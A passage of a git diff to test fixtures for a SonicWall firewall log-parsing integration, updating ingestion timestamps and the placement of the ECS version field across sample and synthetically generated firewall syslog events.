dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242", "event": { - "ingested": "2021-06-09T13:23:15.557822100Z" + "ingested": "2021-12-14T14:54:38.285973201Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=1.1.1.1 
pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557828800Z" + "ingested": "2021-12-14T14:54:38.285973692Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557834600Z" + "ingested": "2021-12-14T14:54:38.285974214Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152", "event": { - "ingested": "2021-06-09T13:23:15.557840600Z" + "ingested": "2021-12-14T14:54:38.285974713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557845800Z" + "ingested": "2021-12-14T14:54:38.285975185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN 
dst=1.1.1.1:50000:WAN", "event": { - "ingested": "2021-06-09T13:23:15.557850800Z" + "ingested": "2021-12-14T14:54:38.285975660Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557855700Z" + "ingested": "2021-12-14T14:54:38.285976167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN type=3 code=3", "event": { - "ingested": "2021-06-09T13:23:15.557861600Z" + "ingested": "2021-12-14T14:54:38.285976664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0", "event": { - "ingested": "2021-06-09T13:23:15.557866900Z" + "ingested": "2021-12-14T14:54:38.285977319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=1.1.1.1:500", "event": { - "ingested": "2021-06-09T13:23:15.557871900Z" + "ingested": "2021-12-14T14:54:38.285977799Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - 
"ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500", "event": { - "ingested": "2021-06-09T13:23:15.557876800Z" + "ingested": "2021-12-14T14:54:38.285978276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500", "event": { - "ingested": "2021-06-09T13:23:15.557881300Z" + "ingested": "2021-12-14T14:54:38.285978789Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "event": { - "ingested": "2021-06-09T13:23:15.557886Z" + "ingested": "2021-12-14T14:54:38.285979271Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445", "event": { - "ingested": "2021-06-09T13:23:15.557890800Z" + "ingested": "2021-12-14T14:54:38.285979888Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN 
dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957", "event": { - "ingested": "2021-06-09T13:23:15.557902200Z" + "ingested": "2021-12-14T14:54:38.285980380Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557906800Z" + "ingested": "2021-12-14T14:54:38.285980866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582", "event": { - "ingested": "2021-06-09T13:23:15.557911500Z" + "ingested": "2021-12-14T14:54:38.285981344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "event": { - "ingested": "2021-06-09T13:23:15.557916300Z" + "ingested": "2021-12-14T14:54:38.285981819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json index 3754eaef6f7..fd16e88f116 100644 --- a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json 
+++ b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "id=nnumqua sn=eacommod time=\"2016/01/29 06:09:59\" fw=10.208.232.8 pri=very-high c=tur m=1197 msg=\"itv\" sess=odoco n=ria src=10.20.234.169:1001:eth5722 dst= 10.208.15.216:4257:lo6125 note= \"ntsunti Protocol:udp\" npcs=ciade", "event": { - "ingested": "2021-06-09T13:23:15.703529400Z" + "ingested": "2021-12-14T14:54:38.699396802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idi id=pexe sn=nes time=\"2016/02/12 13:12:33\" fw=10.254.41.82 pri=low c=Ute m=914 msg=\"lupt\" n=dolore src=10.92.136.230:6437:eth7178:nostrud4819.mail.test dst=10.49.111.67:884:eth3598:oreetdol1714.internal.corp", "event": { - "ingested": "2021-06-09T13:23:15.703550Z" + "ingested": "2021-12-14T14:54:38.699400030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=umexe sn=estlabo time=\"2016/02/26 20:15:08\" fw=10.186.114.123 pri=high c=olupt m=16 Web site accessed", "event": { - "ingested": "2021-06-09T13:23:15.703555700Z" + "ingested": "2021-12-14T14:54:38.699400548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=alo sn=eosquir time=\"2016-3-12 3:17:42\" fw=10.149.203.46 pri=medium c=mwritten m=1369 msg=\"ctetur\" n=uidolorsrc=10.150.156.22:6378:eth6183dst=10.227.15.1:410:eth1977srcMac=01:00:5e:84:66:6cdstMac=01:00:5e:f7:a9:ffproto=rdp/ommfw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703560900Z" + "ingested": "2021-12-14T14:54:38.699400949Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emape id=aer sn=lupt time=\"2016/03/26 10:20:16\" fw=10.26.46.95 pri=medium c=temvel m=127 PPPoE LCP Link Up", "event": { - "ingested": 
"2021-06-09T13:23:15.703564900Z" + "ingested": "2021-12-14T14:54:38.699401326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=consec sn=taliquip time=\"2016/04/09 17:22:51\" fw=10.134.172.34 pri=high c=snos m=170 Received a path MTU icmp message from router/gateway", "event": { - "ingested": "2021-06-09T13:23:15.703569200Z" + "ingested": "2021-12-14T14:54:38.699401686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tconsec sn=nsequat time=\"2016/04/24 00:25:25\" fw=10.137.246.137 pri=medium c=oluptas m=372 msg=\"llu\" n=uptassi src=10.95.245.65 dst=10.13.70.213", "event": { - "ingested": "2021-06-09T13:23:15.703573200Z" + "ingested": "2021-12-14T14:54:38.699402045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llamcorp id=ari sn=eataevit time=\"2016/05/08 07:27:59\" fw=10.50.112.141 pri=very-high c=dmi m=176 Fraudulent Microsoft Certificate Blocked", "event": { - "ingested": "2021-06-09T13:23:15.703577Z" + "ingested": "2021-12-14T14:54:38.699402403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mquisnos id=loremagn sn=iciade time=\"2016/05/22 14:30:33\" fw=10.137.104.79 pri=medium c=mUt m=50 RealAudio decode failure", "event": { - "ingested": "2021-06-09T13:23:15.703580800Z" + "ingested": "2021-12-14T14:54:38.699402765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aali sn=ametcons time=\"2016/06/05 21:33:08\" fw=10.244.98.230 pri=low c=iinea m=87 IKE Responder: Accepting IPSec proposal", "event": { - "ingested": "2021-06-09T13:23:15.703585Z" + "ingested": "2021-12-14T14:54:38.699403183Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emip id=tvol sn=moll time=\"2016/06/20 04:35:42\" fw=10.228.149.225 pri=high c=deomni m=139 msg=\"accept\" n=onse src=10.136.153.149:3788:enp0s2489 dst= 10.16.52.205", "event": { - "ingested": "2021-06-09T13:23:15.703589100Z" + "ingested": "2021-12-14T14:54:38.699403610Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame id=quiratio sn=ite time=\"2016/07/04 11:38:16\" fw=10.72.98.186 pri=very-high c=ercit m=15 Newsgroup blocked", "event": { - "ingested": "2021-06-09T13:23:15.703593200Z" + "ingested": "2021-12-14T14:54:38.699404168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=usan sn=aper time=\"2016/07/18 18:40:50\" fw=10.183.16.166 pri=low c=ender m=70 IPSec packet from illegal host", "event": { - "ingested": "2021-06-09T13:23:15.703599200Z" + "ingested": "2021-12-14T14:54:38.699404530Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=atquovo sn=iumto time=\"2016/08/02 01:43:25\" fw=10.117.18.47 pri=low c=essecill m=129 PPPoE terminated", "event": { - "ingested": "2021-06-09T13:23:15.703603300Z" + "ingested": "2021-12-14T14:54:38.699404890Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=undeo sn=loremip time=\"2016-8-16 8:45:59\" fw=10.134.0.141 pri=very-high c=uis m=1149 msg=\"idolore\" n=onse fw_action=\"cancel\"", "event": { - "ingested": "2021-06-09T13:23:15.703607300Z" + "ingested": "2021-12-14T14:54:38.699405267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=rveli sn=rsint time=\"2016/08/30 15:48:33\" 
fw=10.172.146.234 pri=very-high c=Nemoeni m=81 Smurf Amplification Attack Dropped", "event": { - "ingested": "2021-06-09T13:23:15.703611100Z" + "ingested": "2021-12-14T14:54:38.699405691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=qua sn=luptatev time=\"2016/09/13 22:51:07\" fw=10.123.104.59 pri=low c=elaudant m=1110 msg=\"tinvol\" n=lores", "event": { - "ingested": "2021-06-09T13:23:15.703615100Z" + "ingested": "2021-12-14T14:54:38.699406158Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tatiset sn=eprehen time=\"2016/09/28 05:53:42\" fw=10.117.146.33 pri=high c=entsu m=10 Problem loading the Filter list; check Filter settings", "event": { - "ingested": "2021-06-09T13:23:15.703618800Z" + "ingested": "2021-12-14T14:54:38.699406507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aliq sn=rsitam time=\"2016/10/12 12:56:16\" fw=10.79.33.129 pri=high c=umdolo m=353 msg=\"onproide\" n=Nemoen src=10.241.178.107 dst=10.30.196.102 dstname=fugi4637.www.lan lifeSeconds=imadmini\"", "event": { - "ingested": "2021-06-09T13:23:15.703622400Z" + "ingested": "2021-12-14T14:54:38.699406857Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=itecto sn=erc time=\"2016/10/26 19:58:50\" fw=10.69.57.206 pri=high c=nsec m=68 IPSec Decryption Failed", "event": { - "ingested": "2021-06-09T13:23:15.703626Z" + "ingested": "2021-12-14T14:54:38.699407202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tat sn=tion time=\"2016/11/10 03:01:24\" fw=10.53.150.119 pri=medium c=uasia m=24 msg=\"emp\" n=aperia src=10.157.161.103:383 dst=10.78.151.178:3088 
note=\"taut\"", "event": { - "ingested": "2021-06-09T13:23:15.703629600Z" + "ingested": "2021-12-14T14:54:38.699407563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tati sn=utaliqu time=\"2016/11/24 10:03:59\" fw=10.53.187.44 pri=high c=iadese m=242 msg=\"imidest\" n=emagnama src= 10.153.136.222 dst= 10.206.136.206:4108", "event": { - "ingested": "2021-06-09T13:23:15.703633500Z" + "ingested": "2021-12-14T14:54:38.699407938Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nidolo sn=tatn time=\"2016/12/08 17:06:33\" fw=10.18.109.121 pri=very-high c=dolo m=87 msg=\"Loremip\" n=idolor src=10.204.11.20 dst=10.239.201.234", "event": { - "ingested": "2021-06-09T13:23:15.703637300Z" + "ingested": "2021-12-14T14:54:38.699408300Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quip sn=mporain time=\"2016-12-23 12:09:07\" fw=10.34.161.166 pri=very-high c=sequi m=428 msg=\"rehend\" n=tio src=10.245.200.97:3768:eth4059 dst=10.219.116.137:3452:enp0s3611 srcMac= 01:00:5e:1a:ec:91 dstMac=01:00:5e:e1:73:47 proto=icmp fw_action=\"accept\"", "event": { - "ingested": "2021-06-09T13:23:15.703641100Z" + "ingested": "2021-12-14T14:54:38.699408770Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=idex sn=xerci time=\"2017/01/06 07:11:41\" fw=10.84.206.79 pri=high c=uipe m=401 msg=\"inesci\" n=serror src=10.118.80.140 dst=10.252.122.195 dstname=eFinib", "event": { - "ingested": "2021-06-09T13:23:15.703644900Z" + "ingested": "2021-12-14T14:54:38.699409135Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ari sn=exercit time=\"2017/01/20 14:14:16\" 
fw=10.220.244.59 pri=high c=oluptate m=143 Backup firewall has transitioned to Active", "event": { - "ingested": "2021-06-09T13:23:15.703648700Z" + "ingested": "2021-12-14T14:54:38.699409521Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=serunt sn=aquaeabi time=\"2017/02/03 21:16:50\" fw=10.171.157.74 pri=high c=emoe m=104 Retransmitting DHCP REQUEST (Verifying).", "event": { - "ingested": "2021-06-09T13:23:15.703652300Z" + "ingested": "2021-12-14T14:54:38.699409881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=veniamq sn=one time=\"2017/02/18 04:19:24\" fw=10.4.26.208 pri=very-high c=reseos m=156 Backup received heartbeat from wrong source", "event": { - "ingested": "2021-06-09T13:23:15.703656Z" + "ingested": "2021-12-14T14:54:38.699410273Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tin sn=tenima time=\"2017/03/04 11:21:59\" fw=10.241.177.156 pri=medium c=proide m=132 PPPoE discovery process complete", "event": { - "ingested": "2021-06-09T13:23:15.703659700Z" + "ingested": "2021-12-14T14:54:38.699410629Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tmollita sn=fde time=\"2017-3-18 6:24:33\" fw=10.149.89.126 pri=high c=abo m=794 msg=\"veniamqu\" sid=nse spycat=non spypri=paquioff pktdatId=mquisnos n=maven src=10.86.101.235:3266:lo6501 dst=10.30.153.159:6843:enp0s6487 proto=icmp/eporr fw_action=\"cancel\"", "event": { - "ingested": "2021-06-09T13:23:15.703663300Z" + "ingested": "2021-12-14T14:54:38.699410981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aturQui sn=utlabor time=\"2017/04/02 01:27:07\" 
fw=10.38.249.71 pri=low c=mfugiat m=133 PPPoE starting CHAP Authentication", "event": { - "ingested": "2021-06-09T13:23:15.703666900Z" + "ingested": "2021-12-14T14:54:38.699411359Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tvolu sn=ecte time=\"2017/04/16 08:29:41\" fw=10.130.14.60 pri=low c=iciadese m=9 No new Filter list available", "event": { - "ingested": "2021-06-09T13:23:15.703670400Z" + "ingested": "2021-12-14T14:54:38.699411721Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta id=litse sn=icabo time=\"2017/04/30 15:32:16\" fw=10.89.208.95 pri=low c=llumdolo m=255 msg=\"nre\" n=ercitat src=10.237.163.139 dst=10.162.172.28", "event": { - "ingested": "2021-06-09T13:23:15.703674Z" + "ingested": "2021-12-14T14:54:38.699412081Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo id=ugiatnu sn=ciati time=\"2017/05/14 22:34:50\" fw=10.184.122.157 pri=medium c=scivelit m=31 msg=\"allow\" n=ehen src=10.191.23.41:1493:eth4488 dst= 10.250.47.252 ", "event": { - "ingested": "2021-06-09T13:23:15.703677600Z" + "ingested": "2021-12-14T14:54:38.699412437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=pta sn=tetu time=\"2017/05/29 05:37:24\" fw=10.101.57.134 pri=low c=Nequepo m=12 Problem sending log email; check log settings", "event": { - "ingested": "2021-06-09T13:23:15.703681400Z" + "ingested": "2021-12-14T14:54:38.699412896Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntocc id=uteirure sn=nevo time=\"2017/06/12 12:39:58\" fw=10.226.23.214 pri=very-high c=adip m=994 msg=\"tium\" n=nnum usr=tenbyCi src=10.16.72.220:1842 
dst=10.111.187.12:3577 note=\"quinesc\"", "event": { - "ingested": "2021-06-09T13:23:15.703685Z" + "ingested": "2021-12-14T14:54:38.699413328Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=tur sn=roi time=\"2017/06/26 19:42:33\" fw=10.106.31.86 pri=low c=sno m=7 Log full; deactivating SonicWALL", "event": { - "ingested": "2021-06-09T13:23:15.703688700Z" + "ingested": "2021-12-14T14:54:38.699413685Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntocca id=ostru sn=ntoccae time=\"2017/07/11 02:45:07\" fw=10.35.99.92 pri=medium c=iatisu m=866 msg=\"sec\" sess=cons n=sBon", "event": { - "ingested": "2021-06-09T13:23:15.703692400Z" + "ingested": "2021-12-14T14:54:38.699414035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ten sn=vita time=\"2017/07/25 09:47:41\" fw=10.35.5.16 pri=high c=emaccusa m=538 msg=\"accept\" n=qui src=10.143.76.137:1414:lo3470 dst= 10.131.61.13", "event": { - "ingested": "2021-06-09T13:23:15.703696100Z" + "ingested": "2021-12-14T14:54:38.699414394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=evolu sn=ersp time=\"2017/08/08 16:50:15\" fw=10.64.221.30 pri=medium c=inven m=793 msg=\"osquira\" af_polid=tes af_policy=\"mquame\" af_type=\"nihilmol\" af_service=\"xercita\" af_action=\"trud\" n=eriti src=10.99.0.226:2984:eth1766:sequatu341.mail.invalid dst=10.77.129.130:6604:enp0s4138:Nemoenim2039.api.localhost", "event": { - "ingested": "2021-06-09T13:23:15.703699700Z" + "ingested": "2021-12-14T14:54:38.699415050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nbyCic sn=utlabor time=\"2017/08/22 
23:52:50\" fw=10.27.251.77 pri=medium c=ine m=905 msg=\"lup\" n=tatemUt", "event": { - "ingested": "2021-06-09T13:23:15.703703300Z" + "ingested": "2021-12-14T14:54:38.699415469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quovol sn=nve time=\"2017/09/06 06:55:24\" fw=10.104.201.10 pri=very-high c=ccaecat m=94 Diagnostic Code B", "event": { - "ingested": "2021-06-09T13:23:15.703707300Z" + "ingested": "2021-12-14T14:54:38.699415836Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tau id=exercita sn=ris time=\"2017/09/20 13:57:58\" fw=10.84.25.23 pri=high c=boree m=565 msg=\"intoc\" n=ncidi", "event": { - "ingested": "2021-06-09T13:23:15.703711Z" + "ingested": "2021-12-14T14:54:38.699416198Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "irat id=onev sn=aturauto time=\"2017/10/04 21:00:32\" fw=10.218.243.47 pri=very-high c=oremi m=37 UDP packet dropped", "event": { - "ingested": "2021-06-09T13:23:15.703714700Z" + "ingested": "2021-12-14T14:54:38.699416556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=temUt sn=olor time=\"2017/10/19 04:03:07\" fw=10.19.10.148 pri=low c=niamqui m=4 SonicWALL activated", "event": { - "ingested": "2021-06-09T13:23:15.703718300Z" + "ingested": "2021-12-14T14:54:38.699416916Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ess sn=ipisci time=\"2017/11/02 11:05:41\" fw=10.113.95.59 pri=very-high c=reprehen m=156 Backup received heartbeat from wrong source", "event": { - "ingested": "2021-06-09T13:23:15.703721900Z" + "ingested": "2021-12-14T14:54:38.699417320Z" + }, + "ecs": { + 
